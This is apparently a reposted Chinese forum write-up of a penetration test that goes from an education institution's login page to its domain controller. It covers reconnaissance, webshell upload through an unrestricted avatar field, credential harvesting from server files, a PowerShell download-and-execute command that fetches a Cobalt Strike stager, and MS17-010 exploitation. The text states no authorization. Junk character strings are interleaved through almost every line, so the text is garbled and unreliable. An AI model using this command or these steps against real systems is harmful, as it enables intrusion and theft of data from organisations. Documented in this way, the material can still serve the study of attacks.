|
F( { N; ~" z) x" D+ r
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路1 ~* M, M, f3 i, X4 Q6 y, c" x7 i
, c% W/ y& z; @( s
( u/ W$ _1 N+ o7 i* l, ?8 | " v3 u5 h$ j% U4 g* b; `
( O! i1 r# L3 W6 `1 F* R
# v0 ^1 _$ }. w K7 Z0 Y
正文
+ g+ T) z; b. `) n V8 A 1 r. C' ^# M( W) C. r6 J$ M
/ g1 U, ^: ~" B% J
- H$ d" u& j3 f+ o9 w
9 C/ U, \. O" h6 ^4 ~) B
. J: b! D/ k% ]7 D+ B 目标:www.xxxx.com(一家教育机构) G- a6 r; `5 M/ n% G2 R
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
$ {, t, Z6 o7 p, v & e/ P0 Z1 R3 @! D
" h' n5 G/ z, P6 f4 {4 j3 ^
4 r2 `& E, T- a1 D# S # R6 T! r$ k! a2 }1 F' c
) v5 z1 ^6 n, v0 w& C6 S! x1 J
进行了简单的信息搜集
9 p1 ?( Y! w- R1 E, {7 E4 v1 v0 y - }) [; c, b" g. t0 t0 K" B4 R1 Z
; i& I+ G# v3 L7 I
* X- w7 \: a: {9 A
0 a/ t1 S% V$ d+ n: D5 T: \- [
子域名搜集
5 q. `2 U( y& y% F/ B 3 @0 a. ]9 G9 k- _4 V
# X* V; o. Q0 M
7 f3 {' K& q/ g- Q0 g* q
: y$ {7 b0 Q4 v& A5 J( ^5 y- K `& P' @/ p1 \5 ?/ {$ V
fofa找资产 g5 l7 x4 S: M
1 ]0 P" L* d* R% D5 i0 t: R) p4 c
, p8 M w" e1 h4 |4 ^) P) ^+ y
& y7 J+ h- Y( W( `0 m
3 V. H6 L! [. B% g% C5 w
' i' u* A `8 B 1 X5 O ?, {% ?; |# t# d4 ~8 H
6 i d9 l, V! D' A/ { r2 E 一共七个资产。去重之后只有两个。 & m0 C( F) I R: {
3 c9 R; w5 v7 T2 U9 H2 h% P& h; u% f$ R
+ [/ J. E6 n: C6 i" ~
! C4 T) V; {3 K 目录探测
& W+ \# A! o! |. }- H$ J 1 M1 S! i- h* z" V1 S6 C( E
- J# L, _' m* J- F' o) L+ m/ @ 0 p' I$ y5 T. Z/ M N: G8 ?( m0 ~
+ I8 r) `1 l: c$ V. ~
d2 c6 D2 f! l+ o% @* |) } x
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
! _- ^- Z: t- o
5 v9 m& |$ f7 z* Y/ b2 p& w
Z) T+ X! j; a
/ Q* U! B: l( }: P' h: k( W
2 |( ?( o2 A* b% p# e3 R$ ~ 我又尝试了通过修改返回包来绕过登录界面
5 r6 y4 l5 O# o$ h6 o3 D1 F3 I 1 K5 u* G" S, R! \9 B
7 x5 l2 Y5 j( ~
. ?8 e- @. u4 B7 b7 ~4 q, m' ]
# C. w+ h. a2 G% Z, q0 S" ~% x: m. o! j* S# C2 C1 n# \
还是不行,尝试注入无果% z0 J0 f& ~/ U( s$ R
- l. n; K. A* }$ g: E. E
$ [# M) r9 f, T& o
0 g) y6 _$ L& T/ [9 E* e
, R( Z# A y* ^4 H
/ G- h+ q$ ^$ } 不过我目录探测出了一处Spring信息泄露 7 Z+ F1 y6 G. ~5 q4 @
9 ?! Z" w( [( e. l
( E X+ a$ y! R0 z
/ Q3 _$ n; L3 t9 j/ s% Z0 `5 C8 j( B( X
, u) `7 t3 n: f
% {4 H2 r% [& k
4 `$ k L8 G# S 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
2 ]* o. w$ ]; n$ t9 r' R1 u L ; s$ I$ B8 J: X( @5 ?& ^
' g/ t) u7 Q$ x
* n: t' `5 W5 V$ R3 Q' d
. y: H- D( ?, t5 Q7 A6 z
- x6 J& C, p1 s/ A 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
8 S- D4 E# d" x. ~( ]% g+ y, t! k ! A, Y7 ~9 e8 `- j- |# N
- u6 h' o6 U* u# A/ Y5 W, k w- j! d& f. ]9 t
# K3 F3 l) S$ q! S9 h8 K5 r' I) O Y/ Y
获取有些师傅到这一步就手机抓包电脑测了。1 ~0 F1 j5 Y2 P3 f3 Q1 P
: J6 p6 h% N. r
) R( I; X* X5 T6 N6 X6 O
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。1 M( P8 S( y: x7 x
/ t- F% p1 E' ?1 L; @. B
' R( P8 Y4 Q* C! m! K) ^
其中在一个公众号发现了小程序,可以进行注册。
& g3 A# X- `5 [. s4 u
! S* B4 o; S* {& E; o6 m% U5 Y4 Y! i/ T. P: L% U
看到了头像上传,尝试上传获取WebShell, d+ Q( O; ]$ {; X I- [' ]
. t+ y* h# A6 r) o E+ e. O i
2 N" l1 Y5 w! Q1 t
, T$ ^: v Z; n [8 m; J/ `4 i% `
4 H/ i- _9 j& j5 D- W0 q, q
) H% s, P( q, d4 L5 Q( _ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问3 B+ p; d- _* y1 P
/ {5 _( x& c8 I% u
0 s; s) U+ i* }$ W4 Z' N, k, t: T
1 _' e* _! q b4 z8 _5 x
) |- I" s h& X8 Q# P, f9 L) x; N& ^3 ?( c5 q$ _" X* H, k* Y8 ^
然后上了大马
5 B3 [0 k3 o/ {$ d2 l: A7 z* H9 ` - I/ u" C- U& J. p0 A7 g* R4 J: d
0 W3 v6 \4 m d7 v9 F4 [
4 C# f6 q) r6 p: s6 X7 }5 b7 u; E. q
$ R4 Z% R3 }" g& M2 R f7 J6 z: Q4 m
6 R z9 y% p% A. y C7 p$ T 1 ^1 f* R, ^2 Q
, k3 `! x( {6 j/ j' |- Z 通过翻找文件发现数据库账号密码. a8 y/ d9 ?1 Y' {
; s7 Z! o1 a% M- W" Y
/ r2 _# }) e/ [# q/ z) T g/ p/ s! @/ S( W
% J& K5 ~% C7 O1 N: t
& p' S3 ]. Y9 {' W# o) F5 H
--内网渗透9 j3 ?4 R$ u F+ Y6 r) n
$ T( e7 o( [0 {
& T' }5 h& n9 n' g. b
直接通过powershell执行 cs上线
) L3 U' s: ^: ~* L A+ T * H5 N1 q0 B" P7 I( y
) [* F1 }0 ^- N! ~3 X powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
8 A2 }" c* k, r' f L5 t' P3 b
. Y" @( f4 D1 e3 v6 W- b: j4 G
% ^! a6 @! ] |& [* e- l
/ K: c, l* y( c5 t8 v, a2 f
6 c& J( m7 f& V- X7 h: \( N 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
% M$ b1 }; ~" U
1 m, I' A: m. d6 v
" E, I; \# ] ~' K9 J w' c6 a% m3 b! Y; G
. K. L" V5 c( K/ q. ^ i9 h4 B8 g2 S8 c; F( r, `7 Y6 v
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 ! u$ F" B- y% Z4 V3 Q: M1 A" f
, ?" n. M; f7 p Q
3 @! q( [+ ]3 z5 ^4 v
' \: V l4 j9 ^& e) {$ h* h% Z
8 c$ D6 {# R$ u
$ M& P% ^' W) N2 o " o5 N' s, G3 Q& u: j4 M
# z' o& N' N9 A
0 C& o+ i$ f% f3 \+ W
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
3 |& x6 {! G! _& B0 E
) O6 q" y" b( y% O$ j
: `* l2 g7 O4 u# O+ B
' |6 L3 |1 T6 X7 h# l
" | x$ y! Y& ?& C4 U) a, ^ @* b- ?- Y- x+ |4 w
( P G8 e" A( g( B) h" t! @4 J6 w. |; b7 C
9 y% ^; B9 p" \/ M, `. A9 o; W2 y 9 M" Y/ M, H9 O) J& M
8 E7 |" C# h8 W. E5 K
& j( D5 t& K# c: z b# F& L) }0 J" E* J" \$ J
; M8 q! [$ V( L
5 X+ \' h% O' U- c2 J
v6 m+ t9 C9 v2 J: s0 F5 m3 r4 Q$ } 小结6 L- K9 V6 @6 U+ E) W
6 m0 V0 h' o+ t* w5 R/ ^
0 n3 ~# B: E& \ # l8 {! m, S% ^9 ]- Q
. \! W! x: K; t! D3 c6 T6 d" L/ V' ~
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!" Z% V7 Y% n' V2 C% d& C
0 [8 F) k- @2 Q
2 ~ R$ P! k; r2 G
& d. J, b! p, a
6 u6 F% a; U9 ^+ {
+ ?% T4 \- ^- i% j
- / Q7 X2 c9 M) A/ w" \
( P' e. H. x; D1 W8 F& J
/ u" B1 n- t" k6 E - 2 Z8 ^* E( r3 t9 B1 C2 d9 |
$ i& |6 e# h5 k# V3 [
7 X1 N& _6 r! x( A$ b- A% M
0 y/ K2 |- Q) g ]' d$ x3 l! `# l, ^5 D# R5 Z n. `; T
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html% Q6 F5 _: ~% ?9 B
+ T4 C0 ?# w O5 d, Q2 Q4 e6 M J0 u2 h1 Q
& S9 X8 O; i, n* L) S |